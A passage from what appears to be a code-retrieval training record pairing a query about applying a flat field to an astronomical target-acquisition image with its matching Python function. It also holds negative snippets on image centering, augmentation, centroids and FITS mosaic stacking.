print('Data has {0} groups'.format(ngroups))
print('Using {0} for differencing'.format([frame+1 for frame in frames]))
#need a scale for each additional difference image
scales = [(frames[1]-frames[0]) / (frames[s+2] - frames[s+1]) for s in range(useframes-2)]
scales.insert(0,1.0)
#create diff images
diffs = [scales[i] * (data[frames[i+1], :, :] - data[frames[i], :, :]) for i in range(len(scales))]
#create TA image from element-wise minimum of all diff images
ta_img = np.minimum.reduce(diffs)
elif type(useframes) is list:
assert all(type(n) is int for n in useframes), "When passing a list to useframes, all entries must be integers."
assert len(useframes) in [3, 5], "A useframes list can currently only contain 3 or 5 values."
# once asserted we have a list of 3 or 5 integers, sort and check that the numbers make sense.
useframes.sort()
assert useframes[-1] <= ngroups, "Highest group number exceeds the number of groups in the integration."
# adjust the values to account for python being 0-indexed
frames = [n-1 for n in useframes]
if not silent:
print('Data has {0} groups'.format(ngroups))
print('Using {0} for differencing'.format([frame+1 for frame in frames]))
scale = (frames[1] - frames[0]) / (frames[2] - frames[1])
print('Scale = {0}'.format(scale))
diff21 = data[frames[1], :, :] - data[frames[0], :, :]
diff32 = scale * (data[frames[2], :, :] - data[frames[1], :, :])
ta_img = np.minimum(diff21, diff32)
if save == True:
h0 = fits.PrimaryHDU(ta_img)
hl = fits.HDUList([h0])
indir, inf = os.path.split(infile)
# if we've provided a custom list then add the group numbers to the output filename
if type(useframes) is list:
str_frames = [str(u) for u in useframes]
grps = ''.join(str_frames)
tafile = os.path.join(indir, 'TA_img_grp'+grps+'_for_'+inf)
else:
tafile = os.path.join(indir, 'TA_img_for_'+inf)
hl.writeto(tafile, overwrite=True)
return ta_img
|
[
"def create_ana_images(self):\n log.debug(\"start\")\n os.chdir(self._p_analysis_tmp)\n exif_attributes=self._exif_attributes\n exif_attributes=\" \".join([\"-\"+a for a in exif_attributes])\n\n # quiet option suppreses regular output\n cmd_exif=ImageAnalyzer.CMD_EXIFTOOL_JSON.replace(\"_EXIF_\",self._exiftool)\n cmd_exif=cmd_exif.replace(\"ATT\",exif_attributes)\n\n cmd_out = None\n runner = Runner()\n ret_code=runner.run_cmd(cmd_exif)\n if ret_code == 0:\n cmd_out=runner.get_output()\n files_metadata={}\n\n try:\n files_metadata=json.loads(cmd_out)\n except JSONDecodeError as e:\n err_details={\"msg\":e.msg,\"col\":str(e.colno),\"line\":str(e.lineno)}\n log.error(\"JSON Decode Error: %(msg)s error occured in output at column %(col)s, line %(line)s\",err_details)\n\n for file_metadata in files_metadata:\n\n filename=Path(file_metadata[\"SourceFile\"])\n filename=filename.stem+\"_ana\"+filename.suffix\n file_metadata[\"TargetFile\"]=os.path.join(self._p_analysis,filename)\n file_metadata[\"FocusBox\"]=ImageAnalyzer.get_focus_box(file_metadata)\n file_metadata[\"Description\"]=ImageAnalyzer.create_analysis_text(file_metadata)\n # convert to a os magick command\n draw_config=self._magick_box_config.copy()\n try:\n draw_config[\"_FILE_IN_\"]=file_metadata[\"SourceFile\"]\n draw_config[\"_FILE_OUT_\"]=file_metadata[\"TargetFile\"]\n draw_config[\"_TEXT_\"]=file_metadata[\"Description\"]\n draw_config[\"_X0_\"]=str(file_metadata[\"FocusBox\"][0][0])\n draw_config[\"_Y0_\"]=str(file_metadata[\"FocusBox\"][0][1])\n draw_config[\"_X1_\"]=str(file_metadata[\"FocusBox\"][2][0])\n draw_config[\"_Y1_\"]=str(file_metadata[\"FocusBox\"][2][1])\n except TypeError as e:\n log.error(\"not all metadata found to create focus box (%s)\",e)\n continue\n # replace template\n cmd_magick=ImageAnalyzer.CMD_MAGICK_DRAW_FOCUS_BOX\n for k,v in draw_config.items():\n cmd_magick=cmd_magick.replace(k,v)\n file_metadata[\"CmdMagick\"]=cmd_magick\n\n # writing files with focus box and meta data\n runner = Runner()\n for file_metadata in files_metadata:\n cmd=file_metadata.get(\"CmdMagick\")\n\n if not cmd:\n continue\n ret_code=runner.run_cmd(cmd)\n if ret_code == 0:\n log.info(\"Writing file %s\",file_metadata['TargetFile'])\n cmd_out=runner.get_output()\n else:\n log.error(\"Error writing file %s\",file_metadata['TargetFile'])\n\n return files_metadata",
"def augmentator(images, masks):\n spatial_aug = iaa.Sequential([\n iaa.Fliplr(0.5), # horizontal flips\n iaa.Flipud(0.5), # vertical flips\n iaa.Crop(percent=(0, 0.1)), # random crops\n # Apply affine transformations to each image.\n # Scale/zoom them, translate/move them, rotate them and shear them.\n iaa.Affine(\n scale=(0.8, 1.2),\n translate_percent={\"x\": (-0.1, 0.1), \"y\": (-0.1, 0.1)},\n rotate=(-20, 20),\n # shear=(-20, 20),\n order=[1], # use nearest neighbour or bilinear interpolation (fast)\n cval=125, # if mode is constant, use a cval between 0 and 255\n mode=\"reflect\",\n name=\"Affine\")\n ], random_order=True)\n\n blur_aug = iaa.Sequential([\n # Blur about 50% of all images.\n iaa.Sometimes(0.5,\n iaa.OneOf([\n iaa.GaussianBlur(sigma=(0, 0.5)),\n iaa.AverageBlur(k=(3, 7)),\n iaa.MedianBlur(k=(3, 7)),\n ])\n )\n\n ], random_order=True)\n\n elastic_aug = iaa.Sometimes(0.5, [iaa.ElasticTransformation(alpha=(30, 60), sigma=10)])\n\n other_aug = iaa.Sequential([\n iaa.Sometimes(0.5, [\n iaa.OneOf([\n iaa.contrast.CLAHE(clip_limit=2),\n iaa.contrast.GammaContrast(gamma=(0.5, 2.0))\n ]),\n # change brightness of images\n iaa.Add((-40, 40))\n ])\n ], random_order=True)\n\n # Freeze randomization to apply same to labels\n spatial_det = spatial_aug.to_deterministic()\n elastic_det = elastic_aug.to_deterministic()\n\n # when input mask is float32, the no channels must be 3 as it would be 3 classes.\n # TODO: remove nb_classes parameter, it's deprecated\n segmaps = [SegmentationMapOnImage(m, nb_classes=3, shape=images[i].shape) for i, m in enumerate(masks)]\n\n aug_images, aug_masks = spatial_det.augment_images(images), spatial_det.augment_segmentation_maps(segmaps=segmaps)\n aug_images, aug_masks = elastic_det.augment_images(aug_images), elastic_det.augment_segmentation_maps(segmaps=aug_masks)\n aug_images = blur_aug.augment_images(aug_images)\n aug_images = other_aug.augment_images(aug_images)\n\n # convert seg_maps into numpy arrays with shape (H,W,1)\n # TODO: use get_arr() function for converting to a numpy array the SegmentationMapOnImage instances\n aug_masks = [np.expand_dims(m.arr[:, :, 0], axis=2) for m in aug_masks]\n\n return aug_images, aug_masks",
"def getCentroids(self, srcfile, outfile):\n\n self.srcfile = srcfile\n self.outfile = outfile\n\n with fiona.drivers():\n\n logging.info(\"Reading file: \" + self.srcfile)\n\n with fiona.open(self.srcfile) as src:\n self.meta = src.meta\n self.meta['schema']['geometry'] = 'Point'\n\n logging.info(\"Creating output file: \" + self.outfile)\n\n with fiona.open(self.outfile, 'w', **self.meta) as dst:\n\n for f in src:\n centroid = shape(f['geometry']).centroid\n f['geometry'] = mapping(centroid)\n dst.write(f)\n\n logging.info(\"Done creating centroids for all features. Writing to the specified output file.\")",
"def get_center_estimates( self, oid, frames=None, set_as_new=False ):\n assert oid>=0\n assert oid<len(self.object_names)\n \n if frames is None:\n frames = range(len(self.images)) \n\n better_centers = self.object_seedpoints[oid]\n for f in frames:\n if not self.object_seedpoints[oid][f] is None:\n assert not self.netsurfs[oid][f] is None # segmentation must have been performed\n netsurf = self.netsurfs[oid][f]\n better_centers[f] = np.array(netsurf.get_surface_point(0))\n for i in range(1,netsurf.num_columns):\n better_centers[f] += netsurf.get_surface_point(i)\n better_centers[f] /= netsurf.num_columns\n if not self.silent:\n print(' Updated center to',better_centers[f])\n # update seedpoints if that was desired\n if set_as_new: self.object_seedpoints[oid] = better_centers\n return better_centers",
"def image_center(image, bbox, center_size):\n center = np.array([int(bbox.center_x), int(bbox.center_y)])\n center_init_coords = center - center_size//2\n center_rect = [center_init_coords[0], \n center_init_coords[1], \n center_init_coords[0] + center_size, \n center_init_coords[1] + center_size] #x1, y1, x2, y2\n center_image = image[center_rect[1]: center_rect[3], center_rect[0]: center_rect[2], :] \n center_mn = np.mean(center_image)\n return center_image, center_mn, center_rect",
"def fit_imagecenter(self, center, centroids, angles, popt):\n\n # Radial coordinates\n xmean, ymean = center[0], center[1]\n dx, dy = centroids[\"x\"] - xmean, centroids[\"y\"] - ymean\n radial = np.sqrt(dx**2 + dy**2)\n\n # Fitted angles\n fit_angles = self.polynomial_fit(radial, *popt)\n\n # Normaly a1 and a2 should have the same size\n a1 = abs(angles.reshape(-1))\n a2 = abs(fit_angles.reshape(-1))\n\n linfit = stats.linregress(a1[np.isfinite(a1)], a2[np.isfinite(a2)])\n residuals = abs(a2 - (a1 * linfit[0] + linfit[1]))\n\n return np.nanmean(residuals)",
"def __call__(self,\n image: sitk.Image,\n mask: sitk.Image) -> Tuple[sitk.Image, sitk.Image, sitk.Image]:\n hires_ref = sitk.Image(*self.hires_size, sitk.sitkFloat32)\n lores_ref = sitk.Image(*self.lores_size, sitk.sitkFloat32)\n hires_ref.SetSpacing(self.hires_spacing)\n lores_ref.SetSpacing(self.lores_spacing)\n\n image_centre = find_centre(image)\n hires_centre = find_centre(hires_ref)\n lores_centre = find_centre(lores_ref)\n\n hires_ref.SetOrigin(image_centre - hires_centre)\n lores_ref.SetOrigin(image_centre - lores_centre)\n\n transform = sitk.Transform(3, sitk.sitkComposite)\n mask_centroid = find_centroid(mask)\n centering = sitk.TranslationTransform(3, (mask_centroid - image_centre).tolist())\n transform.AddTransform(centering)\n if self.augment:\n rotation = np.random.uniform(*self.rotation_range) if self.rotation_range is not None else None\n flip = np.random.binomial(1, .5) if self.flip else None\n shear = np.random.uniform(*self.shear_range) if self.shear_range is not None else None\n scaling = np.random.uniform(*self.scaling_range) if self.scaling_range is not None else None\n translation = [\n np.random.uniform(*self.translation_range),\n np.random.uniform(*self.translation_range),\n 0.\n ] if self.translation_range is not None else None\n transform.AddTransform(make_affine_transform(image_centre, rotation, flip, shear, scaling, translation))\n if self.elastic_alpha is not None and self.elastic_grid_size is not None:\n transform.AddTransform(make_elastic_transform(hires_ref, self.elastic_grid_size, self.elastic_alpha))\n\n fill_val = float(sitk.GetArrayViewFromImage(image).min())\n\n hires_image = sitk.Resample(image, hires_ref, transform, sitk.sitkLinear, fill_val)\n lores_image = sitk.Resample(image, lores_ref, transform, sitk.sitkLinear, fill_val)\n hires_mask = sitk.Resample(mask, hires_ref, transform, sitk.sitkNearestNeighbor, 0)\n\n return hires_image, lores_image, hires_mask",
"def offset_mosaic(input_prefix,\n output_prefix,\n filter_list=['w2','m2','w1','uu','bb','vv'],\n min_exp_w2=170, min_exp_m2=230, min_exp_w1=200,\n min_exp_uu=0, min_exp_bb=0, min_exp_vv=0,\n restack_id=False, mask_file=None, use_scattered_light=False):\n\n # make dictionary with the minimum exposure times\n min_exp = {'w2':min_exp_w2, 'm2':min_exp_m2, 'w1':min_exp_w1,\n 'uu':min_exp_uu, 'bb':min_exp_bb, 'vv':min_exp_vv}\n\n # set a file tag for using images corrected for scattered light\n sl_tag = ''\n if use_scattered_light:\n sl_tag = '_sl'\n \n\n # go through each filter to build images\n\n for filt in filter_list:\n\n # ------------------------\n # find unique target IDs, and stack those first\n # ------------------------\n\n # open the images\n with fits.open(input_prefix + filt + '_sk_all'+sl_tag+'.fits') as hdu_sk, fits.open(input_prefix + filt + '_ex_all.fits') as hdu_ex:\n\n # delete the 0th extensions (no images there, and they break later steps)\n del hdu_sk[0]\n del hdu_ex[0]\n \n # remove extensions with exposures shorter than minimum\n exp_time = np.array( [hdu_sk[i].header['EXPOSURE'] for i in range(len(hdu_sk))] )\n remove_ind = np.where(exp_time < min_exp[filt])[0]\n for ind in sorted(remove_ind, reverse=True):\n del hdu_sk[ind]\n del hdu_ex[ind]\n\n\n\n # all of the target IDs\n target_ids = np.array( [hdu_sk[i].header['TARG_ID'] for i in range(len(hdu_sk))] )\n # chop it down to just the unique ones\n target_ids = np.unique(target_ids)\n\n \n for targ in target_ids:\n\n print('')\n print('##### stacking target ID ' + str(targ) + ', filter ' + filt + ' #####')\n print('')\n\n # prefix for saving the files for this target ID\n file_prefix = output_prefix + str(targ) + '_' + filt\n\n # check if this one is done already (by looking for a count rate image)\n if os.path.isfile(file_prefix + '_cr'+sl_tag+'.fits') and (restack_id == False):\n print(str(targ)+' is already done')\n print('')\n continue\n \n \n # temp file to hold snapshots with current target ID\n temp_hdu_sk = fits.HDUList()\n temp_hdu_ex = fits.HDUList()\n\n # append matching snapshots\n [temp_hdu_sk.append(fits.ImageHDU(data=hdu_sk[i].data, header=hdu_sk[i].header)) for i in range(len(hdu_sk)) if hdu_sk[i].header['TARG_ID'] == targ]\n [temp_hdu_ex.append(fits.ImageHDU(data=hdu_ex[i].data, header=hdu_ex[i].header)) for i in range(len(hdu_sk)) if hdu_sk[i].header['TARG_ID'] == targ]\n\n # turn exposure maps into 0s and 1s\n temp_hdu_ex_adj = copy.deepcopy(temp_hdu_ex)\n temp_hdu_ex_adj = exp_to_ones(temp_hdu_ex_adj)\n\n # mask areas with foreground stars, etc.\n if mask_file is not None:\n temp_hdu_ex_adj = mask_image(temp_hdu_ex_adj, mask_file)\n\n # write out to files\n temp_hdu_sk.writeto('targ_temp_sk.fits', overwrite=True)\n temp_hdu_ex_adj.writeto('targ_temp_ex.fits', overwrite=True)\n \n # find the coordinates of the overlapping area\n overlap_x, overlap_y = find_overlap('targ_temp_ex.fits')\n\n # find the biweight of the overlapping areas\n biweight_cps = calc_overlap_val(temp_hdu_sk, temp_hdu_ex, overlap_x, overlap_y)\n\n # apply to the counts images\n hdu_sk_corr, _, hdu_delta_counts = correct_sk(temp_hdu_sk, temp_hdu_ex, biweight_cps)\n \n # write out to files\n hdu_sk_corr.writeto(file_prefix + '_sk_all'+sl_tag+'.fits', overwrite=True)\n hdu_delta_counts.writeto(file_prefix + '_sk_off_all'+sl_tag+'.fits', overwrite=True)\n temp_hdu_ex.writeto(file_prefix + '_ex_all'+sl_tag+'.fits', overwrite=True)\n \n # stack with uvotimsum\n cmd = 'uvotimsum ' + file_prefix + '_sk_all'+sl_tag+'.fits ' + \\\n file_prefix + '_sk'+sl_tag+'.fits exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n cmd = 'uvotimsum ' + file_prefix + '_sk_off_all'+sl_tag+'.fits ' + \\\n file_prefix + '_sk_off'+sl_tag+'.fits exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n cmd = 'uvotimsum ' + file_prefix + '_ex_all'+sl_tag+'.fits ' + \\\n file_prefix + '_ex'+sl_tag+'.fits method=EXPMAP exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n\n # make a count rate image too\n with fits.open(file_prefix + '_sk'+sl_tag+'.fits') as h_sk, fits.open(file_prefix + '_ex'+sl_tag+'.fits') as h_ex:\n cr_hdu = fits.PrimaryHDU(data=h_sk[1].data/h_ex[1].data, header=h_sk[1].header)\n cr_hdu.writeto(file_prefix + '_cr'+sl_tag+'.fits', overwrite=True)\n \n # delete temporary files\n subprocess.run('rm targ_temp_*.fits', shell=True)\n \n \n # ------------------------\n # combine the stacks\n # ------------------------\n\n\n # output file names\n output_file_sk = output_prefix + filt + '_sk'+sl_tag+'.fits'\n output_file_sk_all = output_prefix + filt + '_sk_all'+sl_tag+'.fits'\n output_file_sk_off = output_prefix + filt + '_sk_off'+sl_tag+'.fits'\n output_file_sk_off_all = output_prefix + filt + '_sk_off_all'+sl_tag+'.fits'\n output_file_ex = output_prefix + filt + '_ex'+sl_tag+'.fits'\n output_file_ex_all = output_prefix + filt + '_ex_all'+sl_tag+'.fits'\n output_file_cr = output_prefix + filt + '_cr'+sl_tag+'.fits'\n\n # start out the stacking with the first target ID\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_sk'+sl_tag+'.fits ' + output_file_sk, shell=True)\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_sk_off'+sl_tag+'.fits ' + output_file_sk_off, shell=True)\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_ex'+sl_tag+'.fits ' + output_file_ex, shell=True)\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_sk'+sl_tag+'.fits ' + output_file_sk_all, shell=True)\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_sk_off'+sl_tag+'.fits ' + output_file_sk_off_all, shell=True)\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_ex'+sl_tag+'.fits ' + output_file_ex_all, shell=True)\n # make a count rate image too\n with fits.open(output_file_sk) as h_sk, fits.open(output_file_ex) as h_ex:\n cr_hdu = fits.PrimaryHDU(data=h_sk[1].data/h_ex[1].data, header=h_sk[1].header)\n cr_hdu.writeto(output_file_cr, overwrite=True)\n\n \n # keep track of which target IDs still need to be appended to the image\n remaining_ids = copy.copy(target_ids[1:])\n\n\n # keep going while there are still IDs to append\n while len(remaining_ids) > 0:\n\n # file names for the target IDs\n remaining_id_files_sk = [output_prefix + str(t) + '_' + filt + '_sk'+sl_tag+'.fits' for t in remaining_ids]\n remaining_id_files_sk_off = [output_prefix + str(t) + '_' + filt + '_sk_off'+sl_tag+'.fits' for t in remaining_ids]\n remaining_id_files_ex = [output_prefix + str(t) + '_' + filt + '_ex'+sl_tag+'.fits' for t in remaining_ids]\n \n # find the target ID that has the best overlap with current mosaic\n # (returns index and the overlapping pixels)\n best_ind, overlap_x, overlap_y = most_overlap(output_file_ex, remaining_id_files_ex)\n\n # make an HDU with the counts (sk) image for the mosaic and best ID\n with fits.open(output_file_sk) as hdu_mosaic_sk, fits.open(remaining_id_files_sk[best_ind]) as hdu_best_sk:\n temp_hdu_sk = fits.HDUList()\n temp_hdu_sk.append(fits.ImageHDU(data=hdu_mosaic_sk[1].data, header=hdu_mosaic_sk[1].header))\n temp_hdu_sk.append(fits.ImageHDU(data=hdu_best_sk[1].data, header=hdu_best_sk[1].header))\n # make an HDU with the counts offset image for the mosaic and best ID\n with fits.open(output_file_sk_off) as hdu_mosaic_sk_off, fits.open(remaining_id_files_sk_off[best_ind]) as hdu_best_sk_off:\n temp_hdu_sk_off = fits.HDUList()\n temp_hdu_sk_off.append(fits.ImageHDU(data=hdu_mosaic_sk_off[1].data, header=hdu_mosaic_sk_off[1].header))\n temp_hdu_sk_off.append(fits.ImageHDU(data=hdu_best_sk_off[1].data, header=hdu_best_sk_off[1].header))\n # make an HDU with the exposure image for the mosaic and best ID\n with fits.open(output_file_ex) as hdu_mosaic_ex, fits.open(remaining_id_files_ex[best_ind]) as hdu_best_ex:\n temp_hdu_ex = fits.HDUList()\n temp_hdu_ex.append(fits.ImageHDU(data=hdu_mosaic_ex[1].data, header=hdu_mosaic_ex[1].header))\n temp_hdu_ex.append(fits.ImageHDU(data=hdu_best_ex[1].data, header=hdu_best_ex[1].header))\n \n # find the biweight of the overlapping areas\n biweight_cps = calc_overlap_val(temp_hdu_sk, temp_hdu_ex, overlap_x, overlap_y)\n\n # apply to the counts images\n hdu_sk_corr, delta_cps, hdu_delta_counts = correct_sk(temp_hdu_sk, temp_hdu_ex, biweight_cps)\n\n # save those changes to the individual target ID segments\n with fits.open(output_file_sk_all) as hdu_sk_all, fits.open(output_file_sk_off_all) as hdu_sk_off_all, fits.open(output_file_ex_all) as hdu_ex_all:\n # apply offset to existing segments\n for h in range(1,len(hdu_sk_all)):\n hdu_sk_all[h].data = (hdu_sk_all[h].data/hdu_ex_all[h].data + delta_cps[0]) * hdu_ex_all[h].data\n hdu_sk_all[h].data[hdu_ex_all[h].data == 0] = 0\n hdu_sk_off_all[h].data = hdu_sk_off_all[h].data + (delta_cps[0] * hdu_ex_all[h].data)\n # append new corrected segment\n hdu_sk_all.append(fits.ImageHDU(data=hdu_sk_corr[1].data, header=hdu_sk_corr[1].header))\n hdu_sk_off_all.append(fits.ImageHDU(data=hdu_delta_counts[1].data + temp_hdu_sk_off[1].data,\n header=hdu_delta_counts[1].header))\n hdu_ex_all.append(fits.ImageHDU(data=temp_hdu_ex[1].data, header=temp_hdu_ex[1].header))\n # write out to files\n hdu_sk_all.writeto(output_file_sk_all, overwrite=True)\n hdu_sk_off_all.writeto(output_file_sk_off_all, overwrite=True)\n hdu_ex_all.writeto(output_file_ex_all, overwrite=True)\n \n \n # stack with uvotimsum\n cmd = 'uvotimsum ' + output_file_sk_all + ' ' + output_file_sk + ' exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n cmd = 'uvotimsum ' + output_file_sk_off_all + ' ' + output_file_sk_off + ' exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n cmd = 'uvotimsum ' + output_file_ex_all + ' ' + output_file_ex + ' method=EXPMAP exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n\n # make a count rate image too\n with fits.open(output_file_sk) as h_sk, fits.open(output_file_ex) as h_ex:\n cr_hdu = fits.PrimaryHDU(data=h_sk[1].data/h_ex[1].data, header=h_sk[1].header)\n cr_hdu.writeto(output_file_cr, overwrite=True)\n \n # finally, remove this index from the remaining IDs list\n remaining_ids = np.delete(remaining_ids, best_ind)",
"def __call__(self, images, boxes):\n if images.shape[0] != 4:\n err_msg = \"Currently Exact 4 Images are supported by Mosaic Aug.\"\n logging.error(err_msg)\n raise Exception(err_msg)\n\n x, y = self._mosaic_divide_points()\n mosaic_sub_images, mosaic_boxes = self._mosaic(\n images, boxes, mosaic_divide_points=(x, y))\n\n upper_stack = tf.concat([mosaic_sub_images[0], mosaic_sub_images[1]],\n axis=0)\n lower_stack = tf.concat([mosaic_sub_images[2], mosaic_sub_images[3]],\n axis=0)\n mosaic_image = tf.concat([upper_stack, lower_stack], axis=1)\n return mosaic_image, mosaic_boxes",
"def synthetic_image_maker(x_centroids, y_centroids, fwhm=2.5):\n # Construct synthetic images from centroid/flux data.\n synthetic_image = np.zeros((1024, 1024))\n sigma = fwhm/2.355\n for i in range(len(x_centroids)):\n # Cut out little boxes around each source and add in Gaussian representations. This saves time.\n int_centroid_x = int(np.round(x_centroids[i]))\n int_centroid_y = int(np.round(y_centroids[i]))\n y_cut, x_cut = np.mgrid[int_centroid_y-10:int_centroid_y +\n 10, int_centroid_x-10:int_centroid_x+10]\n dist = np.sqrt((x_cut-x_centroids[i])**2+(y_cut-y_centroids[i])**2)\n synthetic_image[y_cut,\n x_cut] += np.exp(-((dist)**2/(2*sigma**2)+((dist)**2/(2*sigma**2))))\n return(synthetic_image)",
"def test_apply_transformation__image_centering(self, image, label):\n\n sample = {'image': image, 'label': label}\n sample_keys = {'image': 'image'}\n transformation_fn = per_image_standardization\n\n sample_centered = apply_transformation(\n transformation_fn, sample, sample_keys\n )\n\n assert sample_centered['image'].shape == sample['image'].shape\n assert np.allclose(sample_centered['image'].mean(), 0, atol=1e-4)\n assert np.allclose(sample_centered['image'].std(), 1, atol=1e-4)\n assert sample_centered['label'] == 1",
"def init_centroids(num_clusters, image):\n\n # *** START CODE HERE ***\n\n #Reshape the image to 2-d\n w,h,d = image.shape\n x = image.reshape((w * h, d)) \n\n #Find out the total number of image points\n #Use the total number of points to randomly select number of centroids from the image\n n = len(x)\n centroids_init = x[np.random.choice(n, num_clusters, replace=False), :]\n # *** END CODE HERE ***\n\n return centroids_init",
"def make_images_several_energyband(image_size,energy_bins, offset_band, source_name, center, data_store, obs_table_subset,\n exclusion_mask, outdir, make_background_image=True, spectral_index=2.3,\n for_integral_flux=False, radius=10.,save_bkg_norm=True):\n list_mosaicimages=list()\n for i, E in enumerate(energy_bins[0:-1]):\n energy_band = Energy([energy_bins[i].value, energy_bins[i + 1].value], energy_bins.unit)\n print energy_band\n mosaicimages=make_images(image_size,energy_band, offset_band, center, data_store, obs_table_subset, exclusion_mask, outdir,\n make_background_image, spectral_index, for_integral_flux, radius,save_bkg_norm)\n list_mosaicimages.append(mosaicimages)\n if save_bkg_norm:\n table=Table()\n for i,mosaic_images in enumerate(list_mosaicimages):\n table_bkg=mosaic_images.table_bkg_scale\n if i==0:\n array_bkg_scale=np.zeros((len(obs_table_subset),len(energy_bins[0:-1])))\n array_counts=np.zeros((len(obs_table_subset),len(energy_bins[0:-1])))\n itot=0 \n for irun,run in enumerate(table_bkg[\"OBS_ID\"]):\n while run!=obs_table_subset[\"OBS_ID\"][itot]:\n itot+=1\n array_bkg_scale[itot,i]=table_bkg[\"bkg_scale\"][irun]\n array_counts[itot,i]=table_bkg[\"N_counts\"][irun]\n itot+=1\n c0 = fits.Column(name=\"OBS_ID\", format='E', array=table_bkg[\"OBS_ID\"].data)\n c1 = fits.Column(name=\"bkg_norm\", format='PE()', array=array_bkg_scale)\n c2 = fits.Column(name=\"counts\", format='PE()', array=array_counts)\n hdu = fits.BinTableHDU.from_columns([c0, c1,c2])\n ebounds = energy_axis_to_ebounds(energy_bins)\n #ebounds = energy_axis_to_ebounds(BinnedDataAxis(energy_bins[0:-1],energy_bins[1:]))\n prim_hdu = fits.PrimaryHDU()\n hdu_list=fits.HDUList([prim_hdu, hdu, ebounds])\n hdu_list.writeto(outdir + \"/table_bkg_norm_.fits\")",
"def centered_image():\n\tjpeg_data = tf.placeholder(tf.string, name = 'CenteredJPGInput')\n\tdecoded_image = tf.image.decode_jpeg(jpeg_data, channels=MODEL_INPUT_CHANNEL)\n\tdecoded_image_as_float = tf.cast(decoded_image, dtype=tf.float32)\n\tdecoded_image_4d = tf.expand_dims(decoded_image_as_float, 0)\n\tcentered_image = tf.image.resize_image_with_crop_or_pad(decoded_image_4d,\n\t\t\t\t\t\t\t\t\t\t\ttarget_height=MODEL_INPUT_HEIGHT,\n\t\t\t\t\t\t\t\t\t\t\ttarget_width=MODEL_INPUT_WIDTH)\n\n\treturn jpeg_data, centered_image",
"def test_center_mask(self):\n target_shape = 8, 22, 30\n transform_center = tio.CropOrPad(target_shape)\n transform_mask = tio.CropOrPad(target_shape, mask_name='label')\n mask = self.sample_subject['label'].data\n mask *= 0\n mask[0, 4:6, 9:11, 14:16] = 1\n transformed_center = transform_center(self.sample_subject)\n transformed_mask = transform_mask(self.sample_subject)\n zipped = zip(transformed_center.values(), transformed_mask.values())\n for image_center, image_mask in zipped:\n self.assert_tensor_equal(\n image_center.data,\n image_mask.data,\n msg='Data is different after cropping',\n )\n self.assert_tensor_equal(\n image_center.affine,\n image_mask.affine,\n msg='Physical position is different after cropping',\n )",
"def update_image(image, centroids):\n\n # *** START CODE HERE ***\n# print(\"Inside update_image\")\n# print(\"This is image shape inside update_image: \", image.shape)\n w,h,d = image.shape\n x = image.reshape((w * h, d)) \n \n #Function to find centroid which is closest to a given point\n def find_min_dist(point, centroids):\n dist_array = []\n for each_centroid in centroids:\n # finding sum of squares\n sum_sq = np.sum(np.square(point - each_centroid))\n\n # Doing squareroot and\n # printing Euclidean distance\n euclid_distance = np.sqrt(sum_sq)\n dist_array.append(euclid_distance)\n\n minpos = dist_array.index(min(dist_array))\n \n return centroids[minpos]\n \n \n #For each point, find the closest centroid\n #Update the point with the value of the closest centroid\n for each_point in range(len(x)):\n x[each_point] = find_min_dist(x[each_point], centroids)\n \n image = x.reshape(image.shape) \n # *** END CODE HERE ***\n\n return image",
"def compute_centers(self):\n for img in self.images:\n for i in self.images_superpixels[img]:\n # Retrieve all indices where superpixel label equals i\n indices = np.where(self.images_segmented[img] == i)\n # Approximate the center by the medians of the indices in x and y dimension\n self.images_superpixels_center[img].append((np.median(indices[1]), np.median(indices[0])))",
"def build_center_uncenter_transforms(image_shape):\n\n # need to swap rows and cols here apparently! confusing!\n center_shift = np.array([image_shape[1], image_shape[0]]) / 2.0 - 0.5\n tform_uncenter = skimage.transform.SimilarityTransform(translation=-center_shift)\n tform_center = skimage.transform.SimilarityTransform(translation=center_shift)\n return tform_center, tform_uncenter",
"def Patch_Center_1D(self,height_index,width_index):\n # when input dataset is crop_43_1D or crop_59_1D, then only use the spectral information to classify pixels.\n patch = np.zeros((self.band, 1, 1))\n offset = (1-1)//2\n h_index = 0; w_index = 0\n for h in range(height_index-offset, height_index+offset+1):\n for w in range(width_index-offset, width_index+offset+1):\n if h<0 or h>=self.height or w<0 or w>=self.width:\n continue\n else:\n patch[:,h-height_index+offset,w-width_index+offset] = self.transpose_array[:,h,w]\n mean_normalized_patch = []\n for i in range(patch.shape[0]):\n mean_normalized_patch.append(patch[i] - self.mean_array[i]) \n return np.array(mean_normalized_patch)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Apply flat field to TA image. Assume the flat has the format matching those to be used on board by GENTALOCATE. Pixel values are multiplied by 1000 relative to traditional flat field files. (i.e. flat is normalized to a value of 1000). Bad pixels have a value of 65535. Bad pixels receive a value that is interpolated from nearest neighbors.
|
def apply_flat_field(image, flat):
# Make sure flat field values are floats
flat = flat * 1.
# Find bad pixels and set to NaN
bad = flat == 65535
print("Found {} bad pixels in the flat.".format(np.sum(bad)))
flat[bad] = np.nan
# Apply flat
image /= (flat/1000.)
# Use surrounding pixels to set bad pixel values
# NOT SURE IF THIS IS IMPLEMENTED IN THE REAL
# GENTALOCATE OR NOT...
if np.any(bad):
image = fixbadpix(image)
return image
|
[
